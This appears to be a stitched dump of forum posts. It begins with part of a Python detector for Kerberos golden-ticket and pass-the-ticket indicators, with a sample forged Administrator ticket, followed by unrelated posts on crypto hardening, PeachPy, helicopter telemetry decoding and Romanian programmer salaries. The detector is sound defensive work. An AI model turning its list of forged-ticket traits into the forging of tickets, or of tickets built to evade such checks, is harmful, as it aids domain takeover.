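        if cur is None:
            continue
        m = _TIMES.search(line)
        if m:
            cur["start"], cur["end"], cur["renew"] = (
                datetime.strptime(s.strip(), _TIME_FMT) for s in m.groups())
            continue
        m = _FIELD.match(line)
        if m:
            cur["server" if m.group(1) == "Server Name" else "client"] = m.group(2)
            continue
        m = _FLAGS.match(line)
        if m:
            cur["flags"] = [f.strip() for f in m.group(1).split(";") if f.strip()]
    return tickets


def find_suspicious_tgts(text, logon_account):
    """Return [(client name, [reasons])] for every TGT that violates policy.

    logon_account is the account that owns the logon session the listing was
    taken from; a TGT for a different principal in that session is a
    pass-the-ticket indicator, and lifetimes beyond the KDC policy can only
    come from a ticket the KDC never issued."""
    findings = []
    for t in parse_ticket_list(text):
        if not t.get("server", "").startswith("krbtgt/"):
            continue  # only TGTs carry the policy-bounded lifetimes checked here
        reasons = []
        if t["end"] - t["start"] > MAX_TICKET_AGE:
            reasons.append("ticket lifetime exceeds policy")
        if t["renew"] - t["start"] > MAX_RENEW_AGE:
            reasons.append("renew lifetime exceeds policy")
        client = t.get("client", "").split("@")[0].strip()
        if client.lower() != logon_account.lower():
            reasons.append("client %r is not the logon account %r" % (client, logon_account))
        if reasons:
            findings.append((client, reasons))
    return findings


# Constructed sample: the legitimate TGT and the golden ticket from the post,
# as they would appear together in one session's listing.
SAMPLE_LISTING = """
[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014 11:23:28 AM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : evilhacker @ CTU.DOMAIN
   Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;
[00000001] - 17
   Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : Administrator @ CTU.DOMAIN
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
"""

if __name__ == "__main__":
    for client, reasons in find_suspicious_tgts(SAMPLE_LISTING, "evilhacker"):
        print("%s: %s" % (client, "; ".join(reasons)))
```

The same check can be run over `klist` output once its date layout is mapped to `_TIME_FMT`; the lifetime rule is the part that survives regardless of the tool that printed the listing.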
-
Applied Crypto Hardening

Wolfgang Breyha, David Durvaux, Tobias Dussa, L. Aaron Kaplan, Florian Mendel, Christian Mock, Manuel Koschuch, Adi Kriegisch, Ulrich Pöschl, Ramin Sabet, Berg San, Ralf Schlatterbeck, Thomas Schreck, Aaron Zauner, Pepi Zawodsky

(University of Vienna, CERT.be, KIT-CERT, CERT.at, A-SIT/IAIK, coretec.at, FH Campus Wien, VRVis, MilCERT Austria, A-Trust, Runtux.com, Friedrich-Alexander University Erlangen-Nuremberg, azet.org, maclemon.at)

Draft revision: d6ea268 (2014-01-29 21:09:52 +0100) Pepi Zawodsky

Contents

1. Introduction
1.1. Audience
1.2. Related publications
1.3. How to read this guide
1.4. Disclaimer and scope
1.5. Methods

2. Practical recommendations
2.1. Webservers
2.1.1. Apache
2.1.2. lighttpd
2.1.3. nginx
2.1.4. MS IIS
2.2. SSH
2.2.1. OpenSSH
2.2.2. Cisco ASA
2.2.3. Cisco IOS
2.3. Mail Servers
2.3.1. SMTP in general
2.3.2. Dovecot
2.3.3. cyrus-imapd
2.3.4. Postfix
2.3.5. Exim (based on 4.82)
2.4. VPNs
2.4.1. IPsec
2.4.2. Check Point FireWall-1
2.4.3. OpenVPN
2.4.4. PPTP
2.4.5. Cisco ASA
2.4.6. Openswan
2.5. PGP/GPG - Pretty Good Privacy
2.6. IPMI, ILO and other lights out management solutions
2.7. Instant Messaging Systems
2.7.1. General server configuration recommendations
2.7.2. ejabberd
2.7.3. Chat privacy - Off-the-Record Messaging (OTR)
2.7.4. Charybdis
2.7.5. SILC
2.8. Database Systems
2.8.1. Oracle
2.8.2. MySQL
2.8.3. DB2
2.8.4. PostgreSQL
2.9. Intercepting proxy solutions and reverse proxies
2.9.1. squid
2.9.2. Pound

3. Theory
3.1. Overview
3.2. Cipher suites
3.2.1. Architectural overview
3.2.2. Forward Secrecy
3.2.3. Recommended cipher suites
3.2.4. Compatibility
3.2.5. Choosing your own cipher suites
3.3. Random Number Generators
3.3.1. When random number generators fail
3.3.2. Linux
. . . . . . . . . . 62 3.3.3. Recommendations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 3.4. Keylengths . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 3.5. A note on Elliptic Curve Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 3.6. A note on SHA-1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 3.7. A note on Diffie Hellman Key Exchanges . . . . . . . . . . . . . . . . . . . . . . . . . . 66 3.8. Public Key Infrastructures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66 3.8.1. Certificate Authorities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67 3.8.2. Hardening PKI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69 A. Tools 70 A.1. SSL & TLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 A.2. Key length . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 A.3. RNGs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 A.4. Guides . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 B. Links 72 C. Suggested Reading 73 D. Cipher Suite Name Cross-Reference 74 E. Further research 83 Download: https://bettercrypto.org/static/applied-crypto-hardening.pdf
-
[h=1]Portable Efficient Assembly Code-generator in Higher-level Python (PeachPy)[/h]
PeachPy is a Python framework for writing high-performance assembly kernels. PeachPy is developed to simplify writing optimized assembly kernels while preserving all optimization opportunities of traditional assembly. Some PeachPy features:
- Automatic register allocation
- Stack frame management, including re-aligning of the stack frame as needed
- Generating versions of a function for different calling conventions from the same source (e.g. functions for the Microsoft x64 ABI and the System V x86-64 ABI can be generated from the same source)
- Allows constants to be defined in the place where they are used (just like in high-level languages)
- Tracking of the instruction extensions used in the function
- Multiplexing of multiple instruction streams (helpful for software pipelining)
[h=2]Installation[/h]
PeachPy can be installed from PyPI:
pip install PeachPy
The project's own example (Python 2 syntax, as published at the time), reproduced here with line breaks restored:
```python
from peachpy.x64 import *
import peachpy.c  # the C-level ABI/Parameter/Type helpers referenced below

# Use 'x64-ms' for Microsoft x64 ABI
abi = peachpy.c.ABI('x64-sysv')
assembler = Assembler(abi)

# Implement function void add_1(const uint32_t *src, uint32_t *dst, size_t length)
src_argument = peachpy.c.Parameter("src", peachpy.c.Type("const uint32_t*"))
dst_argument = peachpy.c.Parameter("dst", peachpy.c.Type("uint32_t*"))
len_argument = peachpy.c.Parameter("length", peachpy.c.Type("size_t"))

# This optimized kernel will target Intel Nehalem processors. Any instructions which are not
# supported on Intel Nehalem (e.g. AVX instructions) will generate an error. If you don't have
# a particular target in mind, use "Unknown"
with Function(assembler, "add_1", (src_argument, dst_argument, len_argument), "Nehalem"):
    # Load arguments into registers
    srcPointer = GeneralPurposeRegister64()
    LOAD.PARAMETER( srcPointer, src_argument )

    dstPointer = GeneralPurposeRegister64()
    LOAD.PARAMETER( dstPointer, dst_argument )

    length = GeneralPurposeRegister64()
    LOAD.PARAMETER( length, len_argument )

    # Main processing loop. Length must be a multiple of 4.
    LABEL( 'loop' )

    # Load four uint32 values, then advance the source pointer by 16 bytes
    x = SSERegister()
    MOVDQU( x, [srcPointer] )
    ADD( srcPointer, 16 )

    # Add 1 to x (packed 32-bit add against an inline constant)
    PADDD( x, Constant.uint32x4(1) )

    # Store the result and advance the destination pointer
    MOVDQU( [dstPointer], x )
    ADD( dstPointer, 16 )

    # Four elements consumed per iteration
    SUB( length, 4 )
    JNZ( 'loop' )

    RETURN()

print assembler
```
Source: https://bitbucket.org/MDukhan/peachpy
-
[h=3]Mystery signal from a helicopter[/h] Last night, YouTube suggested a video for me. It was a raw clip from a news helicopter filming a police chase in Kansas City, Missouri. I quickly noticed a weird interference in the audio, especially the left channel, and thought it must be caused by the chopper's engine. I turned up the volume and realized it's not interference at all, but a mysterious digital signal! And off we went again. The signal sits alone on the left audio channel, so I can completely isolate it. Judging from the spectrogram, the modulation scheme seems to be BFSK, switching the carrier between 1200 and 2200 Hz. I demodulated it by filtering it with a lowpass and highpass sinc in SoX and comparing the outputs. Now I had a bitstream at 1200 bps. The bitstream consists of packets of 47 bytes each, synchronized by start and stop bits and separated by repetitions of the byte 0x80. Most bits stay constant during the video, but three distinct groups of bytes contain varying data, marked blue below: What could it be? Location telemetry from the helicopter? Information about the camera direction? Video timestamps? The first guess seems to be correct. It is supported by the relationship of two of the three byte groups. If the first 4 bits of each byte are ignored, the data forms a smooth gradient of three-digit numbers in base 10. When plotted parametrically, they form an intriguing winding curve. It is very similar to this plot of the car's position (blue, yellow) along with viewing angles from the helicopter (green), derived from the video by magical image analysis (only the first few minutes shown): When the received curve is overlaid with the car's location trace, we see that 100 steps on the curve scale correspond to exactly 1 minute of arc on the map!
Using this relative information, and the fact that the helicopter circled around the police station in the end, we can plot all the received data points in Google Earth to see the location trace of the helicopter: Update: Apparently the video downlink to ground was transmitted using a transmitter similar to the Nucomm Skymaster TX, which is able to send live GPS coordinates. And this is how they seem to do it. Posted by Oona Räisänen Source: absorptions: Mystery signal from a helicopter
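The demodulation and framing steps the post describes (BFSK switching between 1200 and 2200 Hz, 1200 bps, bytes delimited by start and stop bits), as an added worked example in Python. This is not code from the original post or from its author: it synthesises its own signal so it runs offline, and the 48 kHz sample rate, the 8N1 framing (start bit 0, eight data bits LSB first, stop bit 1), the constructed payload and the assumption that the sample stream begins on a bit boundary are all assumptions of this example, not facts from the post. The detector is a per-bit non-coherent tone correlator rather than the SoX filter pair the author used, and the deframer drops any frame whose stop bit is not a mark, which is how a stray bit or a bad sync shows up in practice.

```python
import math

SAMPLE_RATE = 48000               # constructed: 48 kHz audio
BAUD = 1200                       # 1200 bps, as observed in the post
MARK_HZ, SPACE_HZ = 1200, 2200    # carrier for binary 1 / binary 0 (as in the post)
SAMPLES_PER_BIT = SAMPLE_RATE // BAUD   # 40 samples per bit


def frame_bytes(payload):
    """8N1 async framing (assumed): idle marks, then per byte a 0 start bit,
    eight data bits LSB first and a 1 stop bit."""
    bits = [1, 1, 1, 1]                    # idle line before the first frame
    for byte in payload:
        bits.append(0)                     # start bit
        bits.extend((byte >> i) & 1 for i in range(8))
        bits.append(1)                     # stop bit
    bits.extend([1, 1, 1, 1])              # idle line after the last frame
    return bits


def modulate(bits):
    """Continuous-phase BFSK: one tone per bit, phase carried across bit edges."""
    samples, phase = [], 0.0
    for bit in bits:
        step = 2 * math.pi * (MARK_HZ if bit else SPACE_HZ) / SAMPLE_RATE
        for _ in range(SAMPLES_PER_BIT):
            samples.append(math.sin(phase))
            phase += step
    return samples


def tone_energy(window, freq):
    """Non-coherent detector: magnitude of the correlation of the window with a
    complex tone at freq, so the unknown carrier phase does not matter."""
    i = q = 0.0
    for n, s in enumerate(window):
        angle = 2 * math.pi * freq * n / SAMPLE_RATE
        i += s * math.cos(angle)
        q += s * math.sin(angle)
    return math.hypot(i, q)


def demodulate(samples):
    """Decide mark or space for each bit-length window. Assumes the stream
    starts on a bit boundary (on real audio, symbol timing must be recovered first)."""
    bits = []
    for start in range(0, len(samples) - SAMPLES_PER_BIT + 1, SAMPLES_PER_BIT):
        window = samples[start:start + SAMPLES_PER_BIT]
        mark = tone_energy(window, MARK_HZ)
        space = tone_energy(window, SPACE_HZ)
        bits.append(1 if mark > space else 0)
    return bits


def deframe(bits):
    """Recover bytes from an 8N1 bit stream. A frame whose stop bit is not 1 is a
    framing error: it is discarded and the scan resumes one bit later."""
    out, pos = [], 0
    while pos + 10 <= len(bits):
        if bits[pos] == 1:                 # idle mark or stop bit: keep scanning
            pos += 1
            continue
        data, stop = bits[pos + 1:pos + 9], bits[pos + 9]
        if stop != 1:                      # bad stop bit: resynchronise
            pos += 1
            continue
        out.append(sum(b << i for i, b in enumerate(data)))   # LSB first
        pos += 10
    return bytes(out)


def roundtrip(payload):
    """Frame, modulate, demodulate and deframe a constructed payload."""
    return deframe(demodulate(modulate(frame_bytes(payload))))


if __name__ == "__main__":
    # Constructed payload: two 0x80 separator bytes (as in the post) and some data
    sample = bytes([0x80, 0x80, 0x31, 0x32, 0x33])
    print(roundtrip(sample).hex())
```

With 40 samples per bit the matching tone correlates to about 20 while the other tone leaks at most about 5, so the per-window decision has a comfortable margin even though 1200 and 2200 Hz are not orthogonal over a single bit; the same detector run over a sliding window is the usual starting point for recovering symbol timing on captured audio.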
-
https://www.youtube.com/watch?v=ZWM74Pf_Kd0 Old school. Dedicated to texan. :->
-
There are such people, people who have barely finished university (regardless of their grades) and expect salaries of thousands of euros. On top of that, if you look at their CV, you won't see a single project or any activity they were involved in, so zero experience. I hope you will be realistic, so you don't get screwed really badly. Life is hard. Even if you see news like this everywhere, don't expect people to throw money at you. Look over your own CV and think from the employer's point of view. Ask yourselves how much someone with a CV like yours would be worth. I started at 1600 RON and it was OK, because I'd had lower offers too. But then it grew, little by little. If you are patient and keep learning, it will be much easier in the future. And when I got my first job I applied to about 80 companies, about 15 called me back, and I really did have plenty of projects on my CV. Also, if you are employed at a company, you're not paid well, there hasn't been a raise in a long time and you're not learning much either, my suggestion is to look for work elsewhere. It's not easy to find work either. You may think "Man, I'm smart, the others are dumb", but you'll see it's not quite like that. Anyway, you can be the Einstein of programming; if someone comes along and asks for less than you, that one may be the one who gets hired. I know people came to interviews who didn't know what TCP and UDP are, who couldn't run a `cat` on Linux and who couldn't print the numbers on the main diagonal of a square matrix. But they had salary expectations. It's not good to be a sucker either. If you do well at an interview, ask for more than you deserve. If it's not possible, they may tell you "We can't offer that much, we can offer this much" or they may kick you out. Several things matter: what company it is, how you did at the interview and how the others did, and, very importantly, the period in which you want to get hired.
If you want to get hired in the summer, well, what do you know, a few thousand other students want to do the same thing. I once went to a C++ interview at a company and I was able to answer pretty much all the questions perfectly; they were trivial anyway, virtual functions and other simple things, and honestly, I felt I knew more than the people interviewing me. And they never called back. Then I went to a C++ and algorithms interview and I got a bit tangled up in the algorithms part (I still have work to do on that) and, what do you know, they called and made me an offer bigger than what I had asked for. Another thing would be this: if you get a big salary from the start, meaning over 30-35-40 million, consider the following possibility: hey, these guys probably won't give me a raise any time soon. Then you also have to take the contract into account, because you may not be able to leave the company for about 2 years if they pay you well at the start. Suggestion: read the Labour Code, it will help you. Crap, I've kind of mixed up my ideas, but you get what I meant.
-
Life at the office: 15 inevitable experiences we all go through at work | adevarul.ro
-
The most sought-after job in Romania: salaries go up to 6,000 euros, unemployment does NOT exist, thousands of positions remain unfilled
Alice Gheorghe, 28 Jan 2014
The programmer profession sits at the top of the recruitment channels' lists, companies fight hard to attract and retain specialists, and top salaries for this position exceed the average Romanian income by 10-15 times. WALL-STREET.RO shows you everything you need to know about one of the most lucrative and promising professions in Romania. On the Romanian market there are over 60,000 IT specialists, more than half of them programmers, according to data from the IT recruitment company Temps. "Every year about 5,000-6,000 new positions are created, but the supply of candidates is limited to 2,000-3,000 new graduates," Gabriela Dan, CEO of Temps, an IT recruitment company that is part of the Rinf Outsourcing Solutions group, told WALL-STREET.RO. Beyond that, the newly opened positions are filled through the mobility of candidates from one company to another.
Programmers, the most sought-after IT people
Thus, most of the jobs available in the databases of recruitment agencies or recruitment sites are in the IT field. These, in turn, are generally dominated by programmer positions. "40% of hiring requests in the IT area are for programmers," said Bogdan Florea, general manager of the recruitment company Trenkwalder. "Given the technology boom of the last 5 years, which brought new programming languages to the fore, the programmer profession occupies a top spot. This is due to the need to create IT applications and platforms that will replace classic information systems," explained Cristina Savuica, head of the recruitment company Lugera. Among programmers, too, there is a ranking of the most sought-after specialisations, and at present Java developers are in high demand on the local market, followed by C++ and Mobile (Android and iOS).
"Enterprise solution programmers are the most sought after, owing to the broad scope this type of project can reach. Lately Java Enterprise (J2EE) has been the preferred language for most of these projects, followed by Microsoft solutions such as ASP .NET and .NET. We are also seeing a rapidly growing need for programmers with at least theoretical experience in Big Data or Cloud services. According to LinkedIn studies, since 2008 demand has grown 3,440 times for Big Data and 195 times for Cloud services," Savuica detailed.
How much a programmer earns in Romania
If you have solid theoretical knowledge in the field and are a graduate of automatic control, cybernetics or computer science, you can already think about a salary that most Romanians don't even dream of. Your chances improve if you got involved in programming projects while still at university. While a beginner can earn 500-600 euros at the first job, which is not little at all for the local market, the salary of a professional in the field can go up to 6,000 euros per month. "An entry-level programmer starts from an average salary of 700 euros, a junior in the field, with 1-3 years of experience, earns about 1,000 euros, and a specialist with 3-6 years of experience goes up to 2,000 euros per month. Seniors come to earn as much as 6,000 euros per month," representatives of the recruitment company Adecco stated. Thus, in a market with big temptations, turnover for this position is quite high. "Given that the market offers a great many financial 'temptations', it is quite hard to retain people in a company if you don't also have solid development programmes. For PHP positions, for example, there is a very, very high turnover, with good programmers being called at least twice a week by a potential job offerer," mentioned Gabriela Dan, CEO of Temps.
Developers are lured with generous financial packages, to which various performance-based bonuses are added.
How to make yourself sought after on this market
"A programmer without experience should take as many online courses and certifications as possible. They should also build up experience by signing up on established programming project sites, taking on and completing small projects, which nevertheless add up to a body of demonstrable, project-based experience," advise the Adecco specialists. Also important is acquiring the business knowledge needed to see the impact of the solutions developed, both for users and for the business. "It is important to gain an overview of how the different system architectures integrate," according to Lugera.
What employers look for and don't find
Those currently considering a career in programming should know that there are a few specialisations for which employers struggle to find suitable candidates. Recruiters speak of a series of specialisations they can barely cover, among them Java programmers, especially Java Mobile, C++, or exotic technologies such as Hadoop and Magento. "Specialisations with minimum salaries are also hard to cover, because an IT specialist joins and stays with a company if it has a good reputation, if it invests in people and in certifications for them, if it gives them access to high-performance technologies," say the Adecco specialists.
Romanian specialists are wanted abroad too
A top company, the experience of a job in another culture and, not least, a considerable salary can tempt young people who receive an offer from abroad. "Some foreign companies offer collaborative remote-working solutions to address the needs of distributed programmer teams.
Companies from abroad offer attractive opportunities and are willing to provide considerable benefits to the most innovative programmers. They usually go for the brightest young university graduates or target innovative leaders with refined IT experience. The big global technology players such as Google and Apple attract young programmers who achieve outstanding results in the various contests, educational programmes and IT conferences that these companies organise online," explained Cristina Savuica. Most young people go abroad for an experience of a few years, always planning to return home. "Big companies such as Google, Facebook, Apple and Microsoft attract easily, thanks to the names behind them, here too, but Romanian programmers are not thinking of settling permanently abroad; they do it for a few years, save the money needed for a comfortable independence at home and return to the Mioritic lands," Gabriela Dan stated.
The future sounds good
Whether they choose to go abroad or specialise at home, programmers seem to have a job secured for many years to come. The market is growing continuously and, despite the economic crisis, salaries remain just as well paid. In 2014 most IT companies will be hiring, according to Temps data. Judging by the announcements issued by these companies, the biggest employers will be Microsoft, Dell, Endava, Luxoft, IBM, Oracle and Deutsche Bank. Moreover, an important aspect for this field is that the Romanian state has offered an aid plan to seven companies that plan to hire about 1,000 programmers in Romania this year, among them Microsoft, Dell and Deutsche Bank.
Source: Cel mai dorit job din Romania: salariul urca la 6.000 de euro, somajul NU exista, mii de locuri raman neocupate
-
Windows and ARM Exploitation (EN)
Nytro replied to NO-MERCY's topic in Reverse engineering & exploit development
Really nice video collection. Sticky. -
Sales on RST Market are only allowed for people with 50+ posts. One-week ban.